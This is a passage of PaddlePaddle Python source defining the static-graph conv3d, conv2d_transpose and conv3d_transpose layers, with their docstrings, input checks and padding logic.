`[[0,0], [0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `"NDHWC"`, `pool_padding` can be in the form
`[[0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Default: padding = 0.
dilation (int|tuple): The dilation size. It means the spacing between the kernel points.
If dilation is a tuple, it must contain three integers, (dilation_depth, dilation_height,
dilation_width). Otherwise, dilation_depth = dilation_height = dilation_width = dilation.
Default: dilation = 1.
groups (int): The groups number of the Conv3d Layer. According to grouped
convolution in Alex Krizhevsky's Deep CNN paper: when group=2,
the first half of the filters is only connected to the first half
of the input channels, while the second half of the filters is only
connected to the second half of the input channels. Default: groups=1
param_attr (ParamAttr|None): The parameter attribute for learnable parameters/weights
of conv3d. If it is set to None or one attribute of ParamAttr, conv3d
will create ParamAttr as param_attr. If it is set to None, the parameter
is initialized with :math:`Normal(0.0, std)`, and the :math:`std` is
:math:`(\\frac{2.0 }{filter\_elem\_num})^{0.5}`. Default: None.
bias_attr (ParamAttr|bool|None): The parameter attribute for the bias of conv3d.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv3d
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
use_cudnn (bool): Use cudnn kernel or not, it is valid only when the cudnn
library is installed. Default: True
act (str): Activation type, if it is set to None, activation is not appended.
Default: None.
name(str|None): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
A Tensor representing the conv3d, whose data type is
the same with input. If act is None, the tensor variable storing the
convolution result, and if act is not None, the tensor variable storing
convolution and non-linearity activation result.
Raises:
ValueError: If the type of `use_cudnn` is not bool.
ValueError: If `data_format` is not "NCDHW" or "NDHWC".
ValueError: If the channel dimmention of the input is less than or equal to zero.
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is a tuple, but the element corresponding to the input's batch size is not 0
or the element corresponding to the input's channel is not 0.
ShapeError: If the input is not 5-D Tensor.
ShapeError: If the input's dimension size and filter's dimension size not equal.
ShapeError: If the dimension size of input minus the size of `stride` is not 2.
ShapeError: If the number of input channels is not equal to filter's channels * groups.
ShapeError: If the number of output channels is not be divided by groups.
Examples:
.. code-block:: python
import paddle
import numpy as np
paddle.enable_static()
data = paddle.static.data(name='data', shape=[None, 3, 12, 32, 32], dtype='float32')
param_attr = paddle.framework.ParamAttr(name='conv3d.weight', initializer=paddle.nn.initializer.XavierNormal(), learning_rate=0.001)
res = paddle.static.nn.conv3d(input=data, num_filters=2, filter_size=3, act="relu", param_attr=param_attr)
place = paddle.CPUPlace()
exe = paddle.static.Executor(place)
exe.run(paddle.static.default_startup_program())
x = np.random.rand(1, 3, 12, 32, 32).astype("float32")
output = exe.run(feed={"data": x}, fetch_list=[res])
print(output)
"""
l_type = 'conv3d'
assert param_attr is not False, "param_attr should not be False here."
helper = LayerHelper(l_type, **locals())
dtype = helper.input_dtype()
if not isinstance(use_cudnn, bool):
raise ValueError(
"Attr(use_cudnn) should be True or False. Received "
"Attr(use_cudnn): %s. " % str(use_cudnn)
)
if data_format not in ["NCDHW", "NDHWC"]:
raise ValueError(
"Attr(data_format) should be 'NCDHW' or 'NDHWC'. Received "
"Attr(data_format): %s." % str(data_format)
)
channel_last = data_format == "NDHWC"
if len(input.shape) != 5:
raise ValueError(
"Input should be 5D tensor, but received input with the shape of {}".format(
input.shape
)
)
num_channels = input.shape[4] if channel_last else input.shape[1]
if num_channels < 0:
raise ValueError(
"The channel dimmention of the input(%s) should be defined. "
"Received: %s." % (str(input.shape), str(num_channels))
)
if groups is None:
num_filter_channels = num_channels
elif groups <= 0:
raise ValueError(
"the groups of conv3d should be greater than 0. Received groups: {}".format(
groups
)
)
else:
if num_channels % groups != 0:
raise ValueError(
"The number of input channels must be divisible by Attr(groups). "
"Received: number of channels(%s), groups(%s)."
% (str(num_channels), str(groups))
)
num_filter_channels = num_channels // groups
filter_size = utils.convert_to_list(filter_size, 3, 'filter_size')
stride = utils.convert_to_list(stride, 3, 'stride')
dilation = utils.convert_to_list(dilation, 3, 'dilation')
def _update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 5:
if is_list_or_tuple(padding[0]) and (data_format == "NCDHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding)
)
padding = padding[2:5]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NDHWC"):
if not (padding[0] == [0, 0] and padding[4] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding)
)
padding = padding[1:4]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 6, 'padding')
if utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
elif is_list_or_tuple(padding) and len(padding) == 6:
padding = utils.convert_to_list(padding, 6, 'padding')
if utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
else:
padding = utils.convert_to_list(padding, 3, 'padding')
return padding
padding_algorithm = "EXPLICIT"
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '%s'. It can only be 'SAME' or 'VALID'."
% str(padding)
)
if padding == "VALID":
padding_algorithm = "VALID"
padding = [0, 0, 0]
elif padding == "SAME":
padding_algorithm = "SAME"
padding = [0, 0, 0]
padding = _update_padding(padding, data_format)
input_shape = input.shape
filter_shape = [num_filters, num_filter_channels] + filter_size
def _get_default_param_initializer():
filter_elem_num = (
filter_size[0] * filter_size[1] * filter_size[2] * num_channels
)
if filter_elem_num <= 0:
raise ValueError(
"Invalid filter number, excepted number is larger than 0, but"
" received {}, please check the input shape and "
"filter size.".format(filter_elem_num)
)
std = (2.0 / filter_elem_num) ** 0.5
return Normal(0.0, std, 0)
filter_param = helper.create_parameter(
attr=helper.param_attr,
shape=filter_shape,
dtype=dtype,
default_initializer=_get_default_param_initializer(),
)
pre_bias = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type=l_type,
inputs={
'Input': input,
'Filter': filter_param,
},
outputs={"Output": pre_bias},
attrs={
'strides': stride,
'paddings': padding,
'dilations': dilation,
'groups': groups,
'use_cudnn': use_cudnn,
'use_mkldnn': False,
"padding_algorithm": padding_algorithm,
"data_format": data_format,
},
)
if data_format == 'NCDHW':
pre_act = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
else:
pre_act = helper.append_bias_op(pre_bias, dim_start=4, dim_end=5)
return helper.append_activation(pre_act)
def conv2d_transpose(
input,
num_filters,
output_size=None,
filter_size=None,
padding=0,
stride=1,
dilation=1,
groups=None,
param_attr=None,
bias_attr=None,
use_cudnn=True,
act=None,
name=None,
data_format='NCHW',
):
r"""
:api_attr: Static Graph
The convolution2D transpose layer calculates the output based on the input,
filter, and dilations, strides, paddings. Input(Input) and output(Output)
are in NCHW or NHWC format. Where N is batch size, C is the number of channels,
H is the height of the feature, and W is the width of the feature.
Parameters(dilations, strides, paddings) are two elements. These two elements
represent height and width, respectively. The details of convolution transpose
layer, please refer to the following explanation and references
`therein <https://arxiv.org/pdf/1603.07285.pdf>`_.
If bias attribution and activation type are provided, bias is added to
the output of the convolution, and the corresponding activation function
is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \ast X + b)
Where:
* :math:`X`: Input value, a 4-D Tensor with NCHW or NHWC format.
* :math:`W`: Filter value, a 4-D Tensor with MCHW format.
* :math:`\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D Tensor with shape [M, 1].
* :math:`\sigma`: Activation function.
* :math:`Out`: Output value, a 4-D Tensor with data format 'NCHW' or 'NHWC', the shape of :math:`Out` and :math:`X` may be different.
Example:
- Input:
Input shape: :math:`(N, C_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{in}, C_{out}, H_f, W_f)`
- Output:
Output shape: :math:`(N, C_{out}, H_{out}, W_{out})`
Where
.. math::
H^\prime_{out} &= (H_{in} - 1) * strides[0] - pad_height_top - pad_height_bottom + dilations[0] * (H_f - 1) + 1 \\
W^\prime_{out} &= (W_{in} - 1) * strides[1] - pad_width_left - pad_width_right + dilations[1] * (W_f - 1) + 1 \\
H_{out} &\in [ H^\prime_{out}, H^\prime_{out} + strides[0] ] \\
W_{out} &\in [ W^\prime_{out}, W^\prime_{out} + strides[1] ]
Note:
The conv2d_transpose can be seen as the backward of the conv2d. For conv2d,
when stride > 1, conv2d maps multiple input shape to the same output shape,
so for conv2d_transpose, when stride > 1, input shape maps multiple output shape.
If output_size is None, :math:`H_{out} = H^\prime_{out}, W_{out} = W^\prime_{out}`;
else, the :math:`H_{out}` of the output size must between :math:`H^\prime_{out}`
and :math:`H^\prime_{out} + strides[0]`, and the :math:`W_{out}` of the output size must
between :math:`W^\prime_{out}` and :math:`W^\prime_{out} + strides[1]`,
conv2d_transpose can compute the kernel size automatically.
Args:
input(Tensor): 4-D Tensor with [N, C, H, W] or [N, H, W, C] format,
its data type is float32 or float64.
num_filters(int): The number of the filter. It is as same as the output
image channel.
output_size(int|tuple, optional): The output image size. If output size is a
tuple, it must contain two integers, (image_height, image_width). None if use
filter_size, padding, and stride to calculate output_size.
If output_size and filter_size are specified at the same time, They
should follow the formula above. Default: None. output_size and filter_size
should not be None at the same time.
filter_size(int|tuple, optional): The filter size. If filter_size is a tuple,
it must contain two integers, (filter_size_height, filter_size_width).
Otherwise, filter_size_height = filter_size_width = filter_size. None if
use output size to calculate filter_size. Default: None. filter_size and
output_size should not be None at the same time.
stride(int|tuple, optional): The stride size. It means the stride in transposed convolution.
If stride is a tuple, it must contain two integers, (stride_height, stride_width).
Otherwise, stride_height = stride_width = stride. Default: stride = 1.
padding(str|int|list|tuple, optional): The padding size. It means the number of zero-paddings
on both sides for each dimension. If `padding` is a string, either 'VALID' or
'SAME' which is the padding algorithm. If `padding` is a tuple or list,
it could be in three forms: `[pad_height, pad_width]` or
`[pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`,
and when `data_format` is `"NCHW"`, `padding` can be in the form
`[[0,0], [0,0], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `"NHWC"`, `padding` can be in the form
`[[0,0], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Default: padding = 0.
dilation(int|tuple, optional): The dilation size. It means the spacing between the kernel points.
If dilation is a tuple, it must contain two integers, (dilation_height, dilation_width).
Otherwise, dilation_height = dilation_width = dilation. Default: dilation = 1.
filter_size(int|tuple, optional): The filter size. If filter_size is a tuple,
it must contain two integers, (filter_size_height, filter_size_width).
Otherwise, filter_size_height = filter_size_width = filter_size. None if
use output size to calculate filter_size. Default: None.
groups(int, optional): The groups number of the Conv2d transpose layer. Inspired by
grouped convolution in Alex Krizhevsky's Deep CNN paper, in which
when group=2, the first half of the filters is only connected to the
first half of the input channels, while the second half of the
filters is only connected to the second half of the input channels.
Default: groups = 1.
param_attr (ParamAttr, optional): The parameter attribute for learnable parameters/weights
of conv2d_transpose. If it is set to None or one attribute of ParamAttr, conv2d_transpose
will create ParamAttr as param_attr. If the Initializer of the param_attr
is not set, the parameter is initialized with Xavier. Default: None.
bias_attr (ParamAttr|bool, optional): The parameter attribute for the bias of conv2d_transpose.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv2d_transpose
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
use_cudnn(bool, optional): Use cudnn kernel or not, it is valid only when the cudnn
library is installed. Default: True.
act (str, optional): Activation type, if it is set to None, activation is not appended.
Default: None.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
A Tensor representing the conv2d_transpose, whose
data type is the same with input and shape is (num_batches, channels, out_h,
out_w) or (num_batches, out_h, out_w, channels). If act is None, the tensor
storing the transposed convolution result, and if act is not None, the
tensor storing transposed convolution and non-linearity activation
result.
Raises:
ValueError: If the type of `use_cudnn` is not bool.
ValueError: If `data_format` is not "NCHW" or "NHWC".
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is a tuple, but the element corresponding to the input's batch size is not 0
or the element corresponding to the input's channel is not 0.
ValueError: If `output_size` and filter_size are None at the same time.
ShapeError: If the input is not 4-D Tensor.
ShapeError: If the input's dimension size and filter's dimension size not equal.
ShapeError: If the dimension size of input minus the size of `stride` is not 2.
ShapeError: If the number of input channels is not equal to filter's channels.
ShapeError: If the size of `output_size` is not equal to that of `stride`.
Examples:
.. code-block:: python
import paddle
paddle.enable_static()
data = paddle.static.data(name='data', shape=[None, 3, 32, 32], dtype='float32')
conv2d_transpose = paddle.static.nn.conv2d_transpose(input=data, num_filters=2, filter_size=3)
print(conv2d_transpose.shape) # [-1, 2, 34, 34]
"""
assert (
param_attr is not False
), "param_attr should not be False in conv2d_transpose."
if len(input.shape) != 4:
raise ValueError(
"Input size should be 4, "
"but received {}".format(len(input.shape))
)
if data_format not in ['NCHW', 'NHWC']:
raise ValueError(
"Attr(data_format) of Op(paddle.static.nn.layers.conv2d_transpose) got wrong value: received "
+ data_format
+ " but only NCHW or NHWC supported."
)
input_channel = input.shape[1] if data_format == 'NCHW' else input.shape[-1]
op_type = 'conv2d_transpose'
if (
input_channel == groups
and num_filters == input_channel
and not use_cudnn
):
op_type = 'depthwise_conv2d_transpose'
helper = LayerHelper(op_type, **locals())
if not isinstance(input, Variable):
raise TypeError("Input of conv2d_transpose must be Tensor")
stride = utils.convert_to_list(stride, 2, 'stride')
dilation = utils.convert_to_list(dilation, 2, 'dilation')
if not isinstance(use_cudnn, bool):
raise ValueError("use_cudnn should be True or False")
def _update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 4:
if is_list_or_tuple(padding[0]) and (data_format == "NCHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding)
)
padding = padding[2:4]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NHWC"):
if not (padding[0] == [0, 0] and padding[3] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding)
)
padding = padding[1:3]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 4, 'padding')
else:
padding = utils.convert_to_list(padding, 2, 'padding')
padding = [padding[0], padding[0], padding[1], padding[1]]
return padding
padding_algorithm = "EXPLICIT"
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '%s'. It can only be 'SAME' or 'VALID'."
% str(padding)
)
if padding == "VALID":
padding_algorithm = "VALID"
padding = [0, 0, 0, 0]
elif padding == "SAME":
padding_algorithm = "SAME"
padding = [0, 0, 0, 0]
padding = _update_padding(padding, data_format)
if output_size is None:
output_size = []
elif isinstance(output_size, (list, tuple)):
if utils._contain_var(output_size):
output_size = utils._convert_to_tensor_list(output_size)
else:
output_size = utils.convert_to_list(output_size, 2, 'output_size')
elif isinstance(output_size, int):
output_size = utils.convert_to_list(output_size, 2, 'output_size')
elif isinstance(output_size, Variable):
check_dtype(
output_size.dtype,
'output_size',
['int32', 'int64'],
'conv2d_transpose',
)
if len(output_size.shape) == 1 and (
output_size.shape[0] == 1 or output_size.shape[0] == 2
):
if output_size.shape[0] == 1:
output_size = [output_size, output_size]
else:
raise ValueError("output_size must contain one or two integers.")
else:
raise ValueError(
"output_size should be int, list[int] or tuple[int] or Tensor"
)
if filter_size is None:
if output_size is []:
raise ValueError("output_size must be set when filter_size is None")
if not _non_static_mode():
if isinstance(output_size, Variable) or utils._contain_var(
output_size
):
raise ValueError(
"filter_size should not be None when output_size is Tensor or contain Tensor in static mode."
)
else:
output_size = utils.convert_shape_to_list(output_size)
if len(output_size) == 1:
output_size = utils.convert_to_list(
output_size[0], 2, 'output_size'
)
h_in = input.shape[2] if data_format == 'NCHW' else input.shape[1]
w_in = input.shape[3] if data_format == 'NCHW' else input.shape[2]
filter_size_h = (
output_size[0]
- (h_in - 1) * stride[0]
+ padding[0]
+ padding[1]
- 1
) // dilation[0] + 1
filter_size_w = (
output_size[1]
- (w_in - 1) * stride[1]
+ padding[2]
+ padding[3]
- 1
) // dilation[1] + 1
filter_size = [filter_size_h, filter_size_w]
else:
filter_size = utils.convert_to_list(
filter_size, 2, 'conv2d_transpose.filter_size'
)
if len(padding) == 4 and utils._is_symmetric_padding(padding, 2):
padding = [padding[0], padding[2]]
if groups is None:
groups = 1
elif groups <= 0:
raise ValueError(
"the groups of input must be greater than 0, "
"but received the groups of input is {}".format(groups)
)
filter_shape = [input_channel, num_filters // groups] + filter_size
img_filter = helper.create_parameter(
dtype=input.dtype, shape=filter_shape, attr=helper.param_attr
)
pre_bias = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type=op_type,
inputs={'Input': [input], 'Filter': [img_filter]},
outputs={'Output': pre_bias},
attrs={
'output_size': output_size,
'strides': stride,
'paddings': padding,
'padding_algorithm': padding_algorithm,
'dilations': dilation,
'groups': groups,
'use_cudnn': use_cudnn,
'data_format': data_format,
},
)
if data_format == 'NCHW':
pre_act = helper.append_bias_op(pre_bias, dim_start=1, dim_end=2)
else:
pre_act = helper.append_bias_op(pre_bias, dim_start=3, dim_end=4)
out = helper.append_activation(pre_act)
return out
def conv3d_transpose(
input,
num_filters,
output_size=None,
filter_size=None,
padding=0,
stride=1,
dilation=1,
groups=None,
param_attr=None,
bias_attr=None,
use_cudnn=True,
act=None,
name=None,
data_format='NCDHW',
):
r"""
:api_attr: Static Graph
The convolution3D transpose layer calculates the output based on the input,
filter, and dilations, strides, paddings. Input(Input) and output(Output)
are in NCDHW or NDHWC format. Where N is batch size, C is the number of channels,
D is the depth of the feature, H is the height of the feature, and W
is the width of the feature. Parameters(dilations, strides, paddings) are
two elements. These two elements represent height and width, respectively.
The details of convolution transpose layer, please refer to the following
explanation and references `therein <https://arxiv.org/pdf/1603.07285.pdf>`_.
If bias attribution and activation type are provided, bias is added to
the output of the convolution, and the corresponding activation function
is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \ast X + b)
In the above equation:
* :math:`X`: Input value, a Tensor with NCDHW or NDHWC format.
* :math:`W`: Filter value, a Tensor with MCDHW format.
* :math:`\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D Tensor with shape [M, 1].
* :math:`\sigma`: Activation function.
* :math:`Out`: Output value, the shape of :math:`Out` and :math:`X` may be different.
Example:
- Input:
Input shape: :math:`(N, C_{in}, D_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{in}, C_{out}, D_f, H_f, W_f)`
- Output:
Output shape: :math:`(N, C_{out}, D_{out}, H_{out}, W_{out})`
Where
.. math::
D^\prime_{out} &= (D_{in} - 1) * strides[0] - 2 * paddings[0] + dilations[0] * (D_f - 1) + 1 \\
H^\prime_{out} &= (H_{in} - 1) * strides[1] - 2 * paddings[1] + dilations[1] * (H_f - 1) + 1 \\
W^\prime_{out} &= (W_{in} - 1) * strides[2] - 2 * paddings[2] + dilations[2] * (W_f - 1) + 1 \\
D_{out} &\in [ D^\prime_{out}, D^\prime_{out} + strides[0] ] \\
H_{out} &\in [ H^\prime_{out}, H^\prime_{out} + strides[1] ] \\
W_{out} &\in [ W^\prime_{out}, W^\prime_{out} + strides[2] ]
Note:
The conv3d_transpose can be seen as the backward of the conv3d. For conv3d,
when stride > 1, conv3d maps multiple input shape to the same output shape,
so for conv3d_transpose, when stride > 1, input shape maps multiple output shape.
If output_size is None, :math:`H_{out} = H^\prime_{out}, :math:`H_{out} = \
H^\prime_{out}, W_{out} = W^\prime_{out}`; else, the :math:`D_{out}` of the output
size must between :math:`D^\prime_{out}` and :math:`D^\prime_{out} + strides[0]`,
the :math:`H_{out}` of the output size must between :math:`H^\prime_{out}`
and :math:`H^\prime_{out} + strides[1]`, and the :math:`W_{out}` of the output size must
between :math:`W^\prime_{out}` and :math:`W^\prime_{out} + strides[2]`,
conv3d_transpose can compute the kernel size automatically.
Args:
input(Tensor): The input is 5-D Tensor with shape [N, C, D, H, W] or [N, D, H, W, C], the data type
of input is float32 or float64.
num_filters(int): The number of the filter. It is as same as the output
image channel.
output_size(int|tuple, optional): The output image size. If output size is a
tuple, it must contain three integers, (image_depth, image_height, image_width). This
parameter only works when filter_size is None. If output_size and filter_size are
specified at the same time, They should follow the formula above. Default: None.
Output_size and filter_size should not be None at the same time.
filter_size(int|tuple, optional): The filter size. If filter_size is a tuple,
it must contain three integers, (filter_size_depth, filter_size_height,
filter_size_width). Otherwise, filter_size_depth = filter_size_height = \
filter_size_width = filter_size. None if use output size to
calculate filter_size. Default: None. filter_size and output_size should not be
None at the same time.
padding(int|list|str|tuple, optional): The padding size. The padding argument effectively
adds `dilation * (kernel - 1)` amount of zero-padding on both sides of input. If `padding` is a string,
either 'VALID' or 'SAME' supported, which is the padding algorithm. If `padding`
is a tuple or list, it could be in three forms: `[pad_depth, pad_height, pad_width]` or
`[pad_depth_front, pad_depth_back, pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`,
and when `data_format` is `'NCDHW'`, `padding` can be in the form
`[[0,0], [0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `'NDHWC'`, `padding` can be in the form
`[[0,0], [pad_depth_front, pad_depth_back], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Default: padding = 0.
stride(int|tuple, optional): The stride size. It means the stride in transposed convolution.
If stride is a tuple, it must contain three integers, (stride_depth, stride_height,
stride_width). Otherwise, stride_depth = stride_height = stride_width = stride.
Default: stride = 1.
dilation(int|tuple, optional): The dilation size. It means the spacing between the kernel points.
If dilation is a tuple, it must contain three integers, (dilation_depth, dilation_height,
dilation_width). Otherwise, dilation_depth = dilation_height = dilation_width = dilation.
Default: dilation = 1.
groups(int, optional): The groups number of the Conv3d transpose layer. Inspired by
grouped convolution in Alex Krizhevsky's Deep CNN paper, in which
when group=2, the first half of the filters is only connected to the
first half of the input channels, while the second half of the
filters is only connected to the second half of the input channels.
Default: groups=1
param_attr (ParamAttr, optional): The parameter attribute for learnable parameters/weights
of conv3d_transpose. If it is set to None or one attribute of ParamAttr, conv3d_transpose
will create ParamAttr as param_attr. If the Initializer of the param_attr
is not set, the parameter is initialized with Xavier. Default: None.
bias_attr (ParamAttr|bool, optional): The parameter attribute for the bias of conv3d_transpose.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv3d_transpose
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
use_cudnn(bool, optional): Use cudnn kernel or not, it is valid only when the cudnn
library is installed. Default: True
act (str, optional): Activation type, if it is set to None, activation is not appended.
Default: None.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
A Tensor representing the conv3d_transpose, whose data
type is the same with input and shape is (num_batches, channels, out_d, out_h,
out_w) or (num_batches, out_d, out_h, out_w, channels). If act is None, the tensor
variable storing the transposed convolution result, and if act is not None, the tensor
variable storing transposed convolution and non-linearity activation result.
Raises:
ValueError: If the type of `use_cudnn` is not bool.
ValueError: If `data_format` is not "NCDHW" or "NDHWC".
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is a tuple, but the element corresponding to the input's batch size is not 0
or the element corresponding to the input's channel is not 0.
ValueError: If `output_size` and filter_size are None at the same time.
ShapeError: If the input is not 5-D Tensor.
ShapeError: If the input's dimension size and filter's dimension size not equal.
ShapeError: If the dimension size of input minus the size of `stride` is not 2.
ShapeError: If the number of input channels is not equal to filter's channels.
ShapeError: If the size of `output_size` is not equal to that of `stride`.
Examples:
.. code-block:: python
import paddle
import numpy as np
paddle.enable_static()
data = paddle.static.data(name='data', shape=[None, 3, 12, 32, 32], dtype='float32')
param_attr = paddle.framework.ParamAttr(name='conv3d.weight', initializer=paddle.nn.initializer.XavierNormal(), learning_rate=0.001)
res = paddle.static.nn.conv3d_transpose(input=data, num_filters=2, filter_size=3, act="relu", param_attr=param_attr)
place = paddle.CPUPlace()
exe = paddle.static.Executor(place)
exe.run(paddle.static.default_startup_program())
x = np.random.rand(1, 3, 12, 32, 32).astype("float32")
output = exe.run(feed={"data": x}, fetch_list=[res])
print(output)
"""
assert (
param_attr is not False
), "param_attr should not be False in conv3d_transpose."
if data_format not in ['NCDHW', 'NDHWC']:
raise ValueError(
"Param(data_format) of Op(paddle.static.nn.conv3d_transpose) got wrong value: received "
+ data_format
+ " but only NCDHW or NDHWC supported."
)
l_type = "conv3d_transpose"
helper = LayerHelper(l_type, **locals())
if not isinstance(input, Variable):
raise TypeError("Input of conv3d_transpose must be Tensor")
if len(input.shape) != 5:
raise ValueError(
"Input should be 5D tensor, but received input with the shape of {}".format(
input.shape
)
)
input_channel = (
input.shape[1] if data_format == 'NCDHW' else input.shape[-1]
)
stride = utils.convert_to_list(stride, 3, 'stride')
dilation = utils.convert_to_list(dilation, 3, 'dilation')
if not isinstance(use_cudnn, bool):
raise ValueError("use_cudnn should be True or False")
def _update_padding(padding, data_format):
def is_list_or_tuple(ele):
if isinstance(ele, list) or isinstance(ele, tuple):
return True
return False
if is_list_or_tuple(padding) and len(padding) == 5:
if is_list_or_tuple(padding[0]) and (data_format == "NCDHW"):
if not (padding[0] == [0, 0] and padding[1] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding)
)
padding = padding[2:5]
padding = [ele for a_list in padding for ele in a_list]
elif is_list_or_tuple(padding[0]) and (data_format == "NDHWC"):
if not (padding[0] == [0, 0] and padding[4] == [0, 0]):
raise ValueError(
"Non-zero padding(%s) in the batch or channel dimensions "
"is not supported." % str(padding)
)
padding = padding[1:4]
padding = [ele for a_list in padding for ele in a_list]
padding = utils.convert_to_list(padding, 6, 'padding')
elif is_list_or_tuple(padding) and len(padding) == 6:
padding = utils.convert_to_list(padding, 6, 'padding')
else:
padding = utils.convert_to_list(padding, 3, 'padding')
padding = [
padding[0],
padding[0],
padding[1],
padding[1],
padding[2],
padding[2],
]
return padding
padding_algorithm = "EXPLICIT"
if isinstance(padding, str):
padding = padding.upper()
if padding not in ["SAME", "VALID"]:
raise ValueError(
"Unknown padding: '%s'. It can only be 'SAME' or 'VALID'."
% str(padding)
)
if padding == "VALID":
padding_algorithm = "VALID"
padding = [0, 0, 0, 0, 0, 0]
elif padding == "SAME":
padding_algorithm = "SAME"
padding = [0, 0, 0, 0, 0, 0]
padding = _update_padding(padding, data_format)
if filter_size is None:
if output_size is None:
raise ValueError("output_size must be set when filter_size is None")
if isinstance(output_size, int):
output_size = [output_size, output_size, output_size]
d_in = input.shape[2] if data_format == 'NCDHW' else input.shape[1]
h_in = input.shape[3] if data_format == 'NCDHW' else input.shape[2]
w_in = input.shape[4] if data_format == 'NCDHW' else input.shape[3]
filter_size_d = (
output_size[0]
- (d_in - 1) * stride[0]
+ padding[0]
+ padding[1]
- 1
) // dilation[0] + 1
filter_size_h = (
output_size[1]
- (h_in - 1) * stride[1]
+ padding[2]
+ padding[3]
- 1
) // dilation[1] + 1
filter_size_w = (
output_size[2]
- (w_in - 1) * stride[2]
+ padding[4]
+ padding[5]
- 1
) // dilation[2] + 1
filter_size = [filter_size_d, filter_size_h, filter_size_w]
else:
filter_size = utils.convert_to_list(
filter_size, 3, 'conv3d_transpose.filter_size'
)
if len(padding) == 6 and utils._is_symmetric_padding(padding, 3):
padding = [padding[0], padding[2], padding[4]]
if output_size is None:
output_size = []
elif isinstance(output_size, (list, tuple, int)):
output_size = utils.convert_to_list(output_size, 3, 'output_size')
else:
raise ValueError("output_size should be int, list[int] or tuple[int]")
groups = 1 if groups is None else groups
if groups <= 0:
raise ValueError(
"the groups of conv3d_transpose should be greater than 0. Received groups: {}".format(
groups
)
)
if num_filters % groups != 0:
raise ValueError(
"Attr(num_filters) must be divisible by groups,"
"Received: Attr(num_filters) is {}, the groups is {}".format(
num_filters, groups
)
)
filter_shape = [input_channel, num_filters // groups] + filter_size
img_filter = helper.create_parameter(
dtype=input.dtype, shape=filter_shape, attr=helper.param_attr
)
if data_format == 'NCDHW':
data_format = 'NCHW'
if data_format == 'NDHWC':
data_format = 'NHWC'
pre_bias = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type=l_type,
inputs={'Input': [input], 'Filter': [img_filter]},
outputs={'Output': pre_bias},
attrs={
